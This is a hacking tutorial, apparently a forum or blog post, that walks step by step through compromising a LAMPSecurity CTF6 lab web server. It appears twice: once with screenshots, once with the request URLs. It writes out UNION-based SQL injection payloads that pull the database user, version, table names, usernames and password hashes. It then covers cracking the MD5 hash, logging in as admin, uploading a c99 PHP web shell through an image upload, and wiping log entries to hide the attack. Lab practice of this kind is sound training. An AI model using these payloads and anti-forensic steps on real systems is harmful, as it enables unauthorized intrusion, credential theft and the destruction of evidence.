Hi All,
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
![[Image: mantrahackbar1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tCLVcwqnXcFUIo6LrYpzfoaeCHQd1DIaQ_8BfIKmzal6HvfmSVeSrE5JbbxgMLUwWpWNZBuYxbfQQYZIdn5oZzlqAvimVZN5uDrJU7WDq7LIJVv8ScvJT38ezoJOB81GBxBj-DgxsrV21rz8Ke3RSqkWBh53nQU6jHKUR55-jeiTb7=s0-d)
Step 2:
I went through all the pages of web site and found a page with URL input
![[Image: mantrahackbar2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vQJZz4EFLohNL8wlcewrbLPPtCmFLLPfzYOsJiDLymPyHE0km_6xKWaWAPHgNavfUeBSf4Oq_EWZByJOPNB5b676yERU2vi1lh19rBL_QLHBg6rGFNX5q7MUJSXl52Zn9rIE8swVrNnifLloDQuQEbIeI6IYGdpLZGjuFntdBgMWI7OA=s0-d)
Step 3:
I launched Hackbar by pressing F9
![[Image: mantrahackbar3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s0OMKm2Bs2AozAJ971uyfzUTEgBGmcwS1UfpvHRS0ujddruLbTFiizbLyFLDQJCA3iJGhC7HeARlAFbAaFpCS97yycduaxwulcaktIequpTI0HUL8e6zxd4yVbOBurNvpBu3QfPvaSivHaRjVNbgdSODAYZn54JNqclQsrN-bPsLfo6w=s0-d)
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
![[Image: mantrahackbar4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tNUs9FYn9fOObjlJdz3BG5NkRaihNsjbn4-ZnaozgfcKQcwivIOb5FxW7ho7TLjqb1OElL6sflhGXvMnr79eOJ3dGxXsaACykTTQz61oCnBLniiJDQeoAeS54VbYDPTvoeR9xsY3orhSb1z6sbri2ihTXGaFz2BjGK_9vUjjLcPoCqjQ=s0-d)
Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
![[Image: mantrahackbar6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vMyYRUsXJgA4gWgD-QsSV5lgOELSAI57scOGbbi-OVIBx6BrlnBkafFjVghJl_XCO4BMbrQRKuWvK0DjHcKKyI7hJSdqbFWfwB1dvZtDqbcNm4NnaZ3EcCAvFN0kAJ4jNgWkcsgmoXD-QWZi9Y_padxU5Y-cRvv9hiY5N2tb1jkgilYw=s0-d)
Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
![[Image: mantrahackbar7.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tEpPPW-8Zn5VwPVqjk1uFK65_ZzKEk9y6EZTLRv0J2Ao4zVrLxucwdgLvcsNPWNGzz-C6KhYGFs2d81TFTzjGqlw8sOJ7hgAiz5XffSq2SBrtn6avPC2Vj5TM9SQcUUC0pC6ESYuKmx5t_PSw4PqcSohA3E5KXiKFre6TqjTu_CRb5=s0-d)
Step 7:
I went up to 7 and no change till now
![[Image: mantrahackbar12.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tb7xBIijTtW_UirPeB6s_DQLBqVjFnCOOszNuMlnmrXJUhQfMzPnwiAHeCIiU1yxukXgRtbFrEO_XqlLCgqr0678UV144tFonlYF_mRisL7lpuvu2mnYFNSiprsaKwpHOA363ndlnLWKEXSFh1D9w6Llw0E0j-lU7L7y3vCupmIKiAat8=s0-d)
Step 8:
I'm on 8 now and I can see the page changed
![[Image: mantrahackbar13.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s67yw52YSbRSYt5SdDAk7waGsHjB8u5NDL-IN-brYZYuusX--AaeaI83Z4I7FX-Zoi2i8sCjK5v4Wq0eRNimEh_GAk7_aZaVAbVPi7MxTu8nxBVyCpOOOAYyWoGlBATL_ZWG1DfMuivEg5faZLyt9QO5qF4XjFXFJddYXyXY2lJJxrnrM=s0-d)
Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
![[Image: mantrahackbar14.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u321Xh76gqXls5hDU4ATmzwxzOEeWSnh93DDbE0ZsDOPx6Ly74kBzliJJNHzsphIWdB4fu1P2SxpT1hi7er6xfLMkwf68wBX14SRAbfkHCvfxolK82-86I_TGMnTbb9c5zghVvlnrjHq89ujjvBJQS0hNIPNInaWbZcxiH91KotaYJDpc=s0-d)
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
![[Image: mantrahackbar16.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uxzVxpgywdXdJ57PnbybWi9cKkJwF5ndBEm4Jou-w0eWXv58WY-ilmAyhX7LryFPvHdHQ9sn3ncBbxZe5d2_qwOqakK-DXeQXFtSy8UZOanVX9Kbk9eF2KNX3IK-rCfiFzkwVJsM_YW76cyx2BZAqGpBA04vjS0nwHSgExS06Yge1Qnos=s0-d)
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
![[Image: mantrahackbar19.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_s2cP7p1NhBf1RG9GzswPuR2KBqwvAwz8FFHaa3TVLACRG2rTYP2tRfgwlY3IjkkD-pVGnYNyV24MRWzLvKwti1V6WQZazPemE37ZAAcwM_Jx5PLrSNHLR7W2fNYR8q7RGPZjdjSdodMZbbHECADohq_XRU4C234Qc_V6wbP6wTh14vRw=s0-d)
Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
![[Image: mantrahackbar21.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u5Sqv5hjmsBdAtEYwdGpOqq107Bh5r3pCqWvkZzB1luzfW0nlQ3wopRTnjkV8R_24c-aKRCJJGHdpxeJhHbdF_fF-Pc2XTSWjgAFY09HlA-9ehNTN6RUiRaKxywbeMLyLKjiSCE2ByVFkeR_f3PBrU_88aPiwn6eWBlnS7iwXZSznye_w=s0-d)
The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
![[Image: mantrahackbar22.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uPtEpifcIJl7WlR9HDFJNd6ktrPG2vxP_vfhgRi8nuJDe-0L2_hc5Bmw06aVKt8pv3u1SMZLGyuCmroClol9RuZFd_zJvDpXe2KNuYRoq2qry7bTEehWw9l2R0pMnCpqt2ha2hWLqQ7z2FqhWgkRfRD-4gGn0Ms9u4QmOcY1r469O2OMY=s0-d)
5.0.45 is the version
Step 14:
Let me list all the tables
![[Image: mantrahackbar23.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sQeVOm54jSqqwOkokf0nbXE8uNINq0Gq-JKq4ilTFxcbSLdsIjo-Ug5mf48GUmQx4gdNKUTYKbixUL_bJ3FTjIpgBcMyOOYV63eRxHobQm2vDgHSj-oG8oh4Z6DpbpA9x5Qh17Dcgtjo0JRQajhbjRLrqLC2eTIElGogc4JmCa7hz1gQ=s0-d)
From this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
![[Image: mantrahackbar24.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v_PZ5uLYl9f_ZNvMFxikcHhaiOGBIemfX_rQNa_DPmbGfzTrvgkDbDpeiVnqCUTnmsxHR-h3IbC_jrVQxpQlmzCripI2XHv8mYHLxqjfd32w0juwSCpcPRNSdqlVCwNGx68RrxGl_CQ5ZKAeYEg4jgVU2WH8YkLlY0XxfXSTaptrfnQQ=s0-d)
Step 16:
I want columns from the table "user" and nothing else
![[Image: mantrahackbar25.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vL2FrqrI5kKzZa1luupzIfKF6SeOSUIKobcZ-ZSq-1SRKjPdf_B4EMNblg3xPQrVqB3KS2Ll-HjZsH3gxX1GLgsRpO0fmcQa5C1zi2zM-4e_JBDb2o1K_toWwA7Fyf42xdKp9AtwShU4MJXqpePwBYG0Ql8QQHNgmAZiAnGEMiJMHw-XE=s0-d)
Step 17:
Lets find the user name
![[Image: mantrahackbar27.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tZD6p36LsoH0QVrs0yNWwlo3OKRK4q7KBs_I_hkn_Ga39-oobFexAvcRjF_DjT_iR9D63PGLpQ74LcK_uT4uOXBHuoUlJEHtGg4osby8diqny_68-cVzk3i7h_NnFp1uGLhpO7bcAGZMtCxmIDuASIxQnpwCcp1wPqbH0RZyE2XPk8jMg=s0-d)
Step 18:
Now, what about password
![[Image: mantrahackbar26.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uB87bVs3MIVviXbllCSvRBwv2kmGGyygEFwlso0mbFOAfXEkZ3YFxbZDugfCzd5PYcGmJCaJcunUwFVrlBUsSw7lF0pb1FGh7KWClObNYlDYZ2_9AuDzMdzRt2MmkBxo5Wsvtex7lDPJc4_-74BQZ-krmKQrVXZ0ofDlPHccUN7G9FKIA=s0-d)
Its encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
![[Image: mantrahackbar30.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_supWWZD2mPZjrDWQOT4xwv91X-F5so52KDXesPogqgk_DN7S2OpNlKAG-DSwb0jyL38LZfIIL7EhrGXNw5DWZPH2OMydg0h-IhKIAfv1XzCp_nMxCqgZxYYnawnrL-uu__KvsC881cWzz3whwRFUuDQtmu2SJb8okoqsImQ4ADk48Pzn8=s0-d)
Step 20:
Voila.!!! I got the password
![[Image: mantrahackbar31.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vUIH0qvth1vSBE25hejHT11IBJjY2pG0U3WF9corsfTZYegUi1Wn843bMcme3LCFf84q-0BjJ4QebUV8ItlfRUPsQXtMeZfT-xDYdikM5oOW-nyAHu8EHJWxBr95jlTZewECiQ75rSJjPUhuBZu2IYsyem6je2u7tHGYG2qNSbSgt2Po8=s0-d)
Step 21:
Finding the log in page. Its was right in front of me
![[Image: mantrahackbar32.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tRpz_nzHuA5X0-we-qTHw-jBQiBGScSzsnsoHDAvko6RvCBuKCUyr0OlziMl4osbwaTgPEw_30UKyO071as3rN6G-fZFtJqYUERz4f5UC3RYEr_qbICFpGPBBd1HO-qW21vKvlYNyJyhKKpp3B2dUbvFe0gW94_JGCqSn7Tm0hA06h2WU=s0-d)
Step 22:
Logging in with the credentials I have
![[Image: mantrahackbar33.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uMfASCjoUXla3R0FctC8VHzYjoBDRRlq_OX3IXMZ97UQf3AvSIIQSJ2OCjHs2Jzj5gb2GJsLfshR9G1Z0JyhFqb9Su0XE61-99HKzt8qyjUTolWeqnEOiKj1io_D3g0mre0UnA-6_g8b-SENUUYI-2fTupukIWCxE2VXScCq2occhsW48=s0-d)
Step 23:
Greetings.!!!
![[Image: mantrahackbar35.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uoBlLg3nkDakzRHmMa-kmg4Lq6zTRSPNVL0CN55EzoPm-Mpni-Rb1ZG0qSpNAMbZJ9GSs9JWqlmyUNZ3OnMXQu57sviXG1xe6SUh6XBOZz9LE8zhljAeJttqa1BSaISJ7FEYQCB23_Z2PGecgd_FN0mXnhXN0a7S364hbFEPtQdbyGgSo=s0-d)
Step 24:
I'm an admin now. Look at my powers.
![[Image: mantrahackbar36.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ucznpG7MVIoINaGx2chJEavcR_eQd2hYSGp-kiOXaNtd_DrfiBICwyQ_jJaNooEiAEpx1Vwhy76FcUhTbApXMNGXtWg0e4hLzGhktmfgdbGuV4dJG3keVApcIdPpk2Ndmlb2rSb_0v9x_jLj1vpIChweJKjAz74YSLjmcMcKSGBDwQNV8=s0-d)
Step 25:
Let me add an event
![[Image: mantrahackbar37.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_szNc0iHBPZVbjCBr8k3MrLE0-yogUZDDDtz0CieVW5pCzaz5Q1nS1Nt0D5dX7bA4Yxeqab5ZXLYcs7Q8ZwOcEHLLmiblgY1AqaO2sUl8KZSDTuS58Rt-N2ofJLe1BiE4ADQrj7L_w_ItStpIaXSA2FLsviGLo5NHTdp6yrAQHTlL4ptA=s0-d)
Step 26:
and of course I want to upload a picture
![[Image: mantrahackbar38.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_ubE9zxQImVo786oR-u9bvuFADGBWED_RuPLBgaI00ob8ibBoG013J4SoSh2qn1OeNrjswfeotGkBCu_21DfuipdaVv-ekq0cB0JmmtZiIB8v_-JyZ_s6hVzJMVcelah-UmkMgmUFr9X6QLYkEMY6pplS2U6IhVmyPTobo9QM68kLOwfQ=s0-d)
Step 27:
Lets see it allows me to upload the shell or not
![[Image: mantrahackbar39.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_toYAmPFbhdt9zI2C6wVxJFC6-N18xJQpUciruILdTH2Hc2OKQsuA8gJKFJuuPVdo4WofmssYNSRxIXQUvHICCuqjdEF61Fyne5z8SM0R5ZBz3NC7bfp2qQtpnkhFH5c5CKiq7rqVNg2aiqUBiGMyrAsYYYYS3jcRvPTvR4i_tEuIjsfIU=s0-d)
Step 28:
Now I'm pressing on "Add Event" button
![[Image: mantrahackbar40.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sNUiE6nF5eZCcIK3Ca4801ISXhi85wFrXXMr_fA_v79brDKHipExNacEvDKdOhEyIwaps5HjTi_a7CFO3soS_WGsk7pD-NuN_uF1yVCd_hCeQT_WgRlTXwOlh_rErp_dsyeDCtqHJ9l_EiAwJskTQMyHbNGohA-WIsmZjMnyp5p7cwr_4=s0-d)
Step 29:
Nice. Looks like it's got uploaded
![[Image: mantrahackbar41.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uYtyPNE-wUK82D38upGD6oWw51xix1p5Lg_FyIOd9nEqw0ypcwB8H-utqWGt0ekzKfan4fGfv3gfkPvJMf4VvH1qkUkE0ACYWv4Rkez_gVI9GG10afzOvr-6xlsKiI9uA16BJKqNBcIsgyb9rUOU5SlYaXADFupZwsRg8Xr7AU9p3vjA=s0-d)
Step 30:
Let's see where the shell got uploaded to
![[Image: mantrahackbar42.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sPo_OMqj82D-ZCyY4ngzHU5PpZ9cxLalzHdP54RsEfd25e4Yj9MGLLweE-CvJzLn4U8AuIES4JTMxxWTknNSgDobwO7DCdMaf2rcJBTBVB8QrZ0gzH6FgXfjnXTU8hR8q-uG0KanQpBDvPyU8gl1CHJkEBTx-pQLZTwbZikP_R0ACmRlE=s0-d)
Step 31:
I'm trying to get the default upload location
![[Image: mantrahackbar43.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uDmvzpoeQIR935P4LzIuEvDv87SYqSqzSk3lhkOrXD3xq2lK9wcPxAgJfzxhUvaknjhEC4_JnndWod4hlVv1QMQd4dmuRykOmjSqC6x6zPqsny1aGYTvQmIYydcr1VUoSGyAhG5R4qkXcWjn1OoNsWNtqQawDjGIzt6AYJEmczWNDYaIY=s0-d)
![[Image: mantrahackbar44.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sK0TYOWoYUw87olQ-tCxlBuqeC2m_KxYDJOjBkzmfzeAdCYCk3thk4LI5gG42066b0iULdoJwhsRl95Trhag8rys3ax_OCyNx_Yp3bCbTZZ8oTfc0QlQG9g5YQ47ELL3-M5ouzjArSCSIX4mGySFWtxw3vw1w_jNxLnaT0xnPRYdkZ_CQ=s0-d)
Step 32:
Looks like I got it
![[Image: mantrahackbar45.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uPQMhZ8qXVvOT7bez87b6AwdEpvVDe-kW_VFnqkzKF-OZDW3ZppDuTFNkxtNMbPEPxVZ2lDeCZsi6LihxQ5Uym0g30HdSCnwUPZLH9_60ZMZX3VxlxKn1iozqRKUCyc9Kzj7qRz-2vSuaTIk8VMvjHT5xRtklCbTzpm-YmSicFfqd1fTg=s0-d)
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
![[Image: mantrahackbar46.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t2t6bwuDXU64KAaLIhXZ831i9-kEN29qXciJDhRN6ez14Bx1Z5etzZlPeilZlyLABhEMAQmVplsyW0rZu2fy_JoNBeDGYgvvLZNeiZXk02lbN2VdMpa6_tCly5J8TsrggTMrmbvRI1k4MoU-0XRzxmsLtx3pKyP3JcBWLfWXfhr3bE3fQ=s0-d)
Step 34:
I simply clicked on the up button to get the root folder
![[Image: mantrahackbar48.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vk2zZxCVBsjgRTW_FVbmROnvDG76IuPOWcHu0hrqIz1Cz9lM0R6tH40cmAhyam0DE42xZnWMNutTXz2qg_NFogjIHJZzOYAvGexiXByJIgd0FGgLNPKym4TbYDGlS-i-1G-6tVw_3GS52w1YSmAv_tiSwTUqAWVFG9iN4iivGoWRadtzw=s0-d)
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
![[Image: mantrahackbar49.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sQqb_m3xsUj0mVLbAg6cWMLA15Jt7GrL-z_vTFjVcOAwxQWpoxICd7EdRfb7Sa5eAFmFU-0fkr_20FPPzKJRQssJHU1JtyN7rwsJvE9o_zgoTPsF5fwvNC9ADOodap7q9FlYzGqqG6PcliB5beTqfsN1zlYsJd9cXfNkOcOUUcUiytEOs=s0-d)
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
![[Image: mantrahackbar51.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sXKJLiQiwEuYUwQU5twinCwCOnMe1cnuXjuM2cqBJKBOMYGfwh9qWIqPdi4iYrVH87ToRb6jTGZie5o5oGnq5IyhmaudvvZjFw98PRJqhCIwOPUWLcB-uXPcj6YLzSI0wEmKo250nSIV46-xP9pmnb3C2cKW2UVAK0qyCzPddGe_M8nA=s0-d)
Step 37:
Let me go back and edit the log file
![[Image: mantrahackbar52.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vae9OCVCyiApXcfqdu6mZqMTvgCoztcvGDvjeQzvJum5exeIXHoVPOM_KcoXqL2TAwJMh-uthyVBCP3FgiQsHcLPkRJlUZLQLp5X01XA7LLyVGRQvSecVBBy-oqV6C4Pc5eLF4KCqljh_5_OC1KdyYnX4WQpkv8skMa86dPPEhXkS5ms0=s0-d)
![[Image: mantrahackbar53.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sfup0hXiyA_ZRwtVGKFQ0SMqlzh5UpVtTdEE_V9v6Uv_fURBCUB3g4ofG8Ea8TL6OSOL4_ytVE_85ad3Bpu9S5uH-X8ubMyDCmRd-4KheJTxfnGxrJ3oQBCh2QuvB8wCHwmQFQdpnJX52mqKHA_3UEsBR3TJ7NIXyIHH9KVSwCTCOX8Q=s0-d)
Step 38:
I deleted complete log entries. Now saving it.
![[Image: mantrahackbar54.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tKVUAo6LeXtSxiEBzqsCwdDA6osX3_9w5v4p8WVwXsTO8p2plpBCOz5sT8wqo3B3yuxH8dCDBC5ZHmgvwOsO7RMS7Y41LjtD1cSfLPK6yZFp2XCZ8l2XTR6lyLcaR6qIG6uJmy1Gx5iZc-ey5dKIkVE_zFS53ShicU9akI_xsFOPk2NpE=s0-d)
Step 39:
Nice. Log file is empty now
![[Image: mantrahackbar56.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tRHEHUR044NZnBiKxTsMKUG392jry9W_PUEAFc4kNmVxX3ymj3r9pLqkkGO8sztfNGwIzGBaxhqlXs3VDl3HurQqBV4VkFjQu-0NPYxh02fHMalVf70f6XHeYXR6gzQYlcl2q5iQX2txRI3e97Xp0_0QxC7CzAExPfAn0QYntLzYkSu64=s0-d)
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
![[Image: mantrahackbar57.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sdQHJQosSIkBLgmsN7DDBtxjAG6EC65cwZpdxWVNNspMey3uubGqQv7NrX-f_t9pEtk58YaPGYrj9gBiZdsh0lJZFNmPrvehOjov67nJHB_yB3fe-nGeMM8Tn7Bexy-MyPyc9en5hs-EzCutv2ctp2bejxrs6GTHa6GUR4u6cxzWx2FTY=s0-d)
Step 41:
Confirmed.!!!
![[Image: mantrahackbar58.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tLwmbrmEosdSI0Vl8wBgqj_v0ZN-qQ5T6zJ221v9hEPEB-uTYl04wAi-NGF66Aq6MeY5zxtUFQ5UZWWxv94Ls2fhJb2Prkw30oozjm0haBZY9pCzYERQi9fdPkW7PdDiThjf0fi1kDYvBbSE97qOgLZMtWG_hk5w-BPl2-rlE4IHq2qqw=s0-d)
Step 42:
OK. Good Bye C99
![[Image: mantrahackbar59.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sahuPEZK7iPYm0h4ro8jo1aErgfjEcT_N80qx8_DB6RpyxextsFtjXfwsVEjBMJVLvN_z4vcIQdPgfV64fkC0A_hZNdhhOkbrSUtc2gaONUIzNpCe68hkK7kut0mR6tmLLCXfisauDhLcS4v7T6NQXwJ7GmIQvG_Yrsvjyf_xZX8SbZw=s0-d)
Step 43:
Well. It got deleted itself
![[Image: mantrahackbar60.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_u1XXgC_6gP1sfBR4P39vzqn8AbjxtAhEncNyXZRzUvPPQx41HjR1SLHeMP2uGsbPTar5zMQjR1Kdk48nQdlFOasq5DLzcYrGX1rQDHwyna6QulaS9n7NDcYl4SOGnVowoF_Fa2HTuv8E9k7PFXUvtD4QyrDBbX-aJUh3jvvQYijC4D1G0=s0-d)
In this tutorial we will be rooting a vulnerable web server using Mantra Security Toolkit.
What all you need
1. Mantra Security Toolkit - Download
2. A vulnerable website. I'm using a modified version of LAMPSecurity CTF6
3. Any PHP Shell you are comfortable with
- Google for "c99 shell"
Now the process
Step 1:
I'm on the home page of the website now
http://192.168.132.128/
Step 2:
I went through all the pages of web site and found a page with URL input
http://192.168.132.128/?id=13
Step 3:
I launched Hackbar by pressing F9
Step 4:
The power of single quote. I'm checking the web site is vulnerable or not by putting a ' at the end of the URL and pressing Execute.
http://192.168.132.128/?id=13'Since the page content is different from the previous one. I can make sure that the web page is vulnerable.
Step 5:
Lets find out the number of tables
http://192.168.132.128/?id=13 order by 1Step 6:
I have to keep on increasing the last number till I see any changes in the page. In usual practice its gonna be a tedious task since there will be hundreds and thousands of tables if not more. But with this tool I can simply press on + button till I see any changes on the webpage
http://192.168.132.128/?id=13 order by 7Step 7:
I went up to 7 and no change till now
http://192.168.132.128/?id=13 order by 7Step 8:
I'm on 8 now and I can see the page changed
http://192.168.132.128/?id=13 order by 8Step 9:
Now lets go ahead and make a UNION statement. I just went to SQL > UNION SELECT STATEMENT
Step 10:
I provided the number of tables. Since I got a different page on table 8, I can make sure that table 8 does not exists and there are only 7 tables
Step 11:
Wonderful. I can see some numbers on the page now. Those are the vulnerable columns. Lets take the number 2
http://192.168.132.128/?id=13 UNION SELECT 1,2,3,4,5,6,7Step 12:
I replaced number 2 in URL with another SQL command, it got executed and result is displayed on the page
http://192.168.132.128/?id=13 UNION SELECT 1,user(),3,4,5,6,7The current user is cms_user@localhost
Step 13:
Lets find out the version of the database. I replaced 2 in the URL with version() command
http://192.168.132.128/?id=13 UNION SELECT 1,version(),3,4,5,6,75.0.45 is the version
Step 14:
Let me list all the tables
http://192.168.132.128/?id=13 UNION SELECT 1,table_name,3,4,5,6,7 from information_schema.tablesFrom this list I found "user" is an interesting table
Step 15:
Now I listed all the columns and its a big list
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columnsStep 16:
I want columns from the table "user" and nothing else
http://192.168.132.128/?id=13 UNION SELECT 1,column_name,3,4,5,6,7 from information_schema.columns where table_name='user'Step 17:
Lets find the user name
http://192.168.132.128/?id=13 UNION SELECT 1,user_username,3,4,5,6,7 from userStep 18:
Now, what about password
http://192.168.132.128/?id=13 UNION SELECT 1,user_password,3,4,5,6,7 from userIts encrypted
Step 19:
Decrypting the password. I copied the MD5 hash, pasted it into hackbar and went to Encryption > MD5 Menu > send to > md5.rednoize.com
Step 20:
Voila.!!! I got the password
Step 21:
Finding the log in page. Its was right in front of me
Step 22:
Logging in with the credentials I have
Step 23:
Greetings.!!!
Step 24:
I'm an admin now. Look at my powers.
Step 25:
Let me add an event
Step 26:
and of course I want to upload a picture
Step 27:
Lets see it allows me to upload the shell or not
Step 28:
Now I'm pressing on "Add Event" button
Step 29:
Nice. Looks like it's got uploaded
Step 30:
Let's see where the shell got uploaded to
Step 31:
I'm trying to get the default upload location
Step 32:
Looks like I got it
Let me click on the c9shell.php file I just uploaded
Step 33:
Voila. I have shell access
Step 34:
I simply clicked on the up button to get the root folder
Now I can do whatever I wish. Deface the website, maintaining access or what ever. But its out of the scope of current tutorial
Step 35:
What I'm interested is the log folder
Step 36:
I clicked on the log.log file and it has the logs of my noisy SQL injection attacks
Step 37:
Let me go back and edit the log file
Step 38:
I deleted complete log entries. Now saving it.
Step 39:
Nice. Log file is empty now
Step 40:
Now. Lets remove the c99 shell by pressing on Self Remove
Step 41:
Confirmed.!!!
Step 42:
OK. Good Bye C99
Step 43:
Well. It got deleted itself
H4qqy H4ck!ng
Tags
bypassing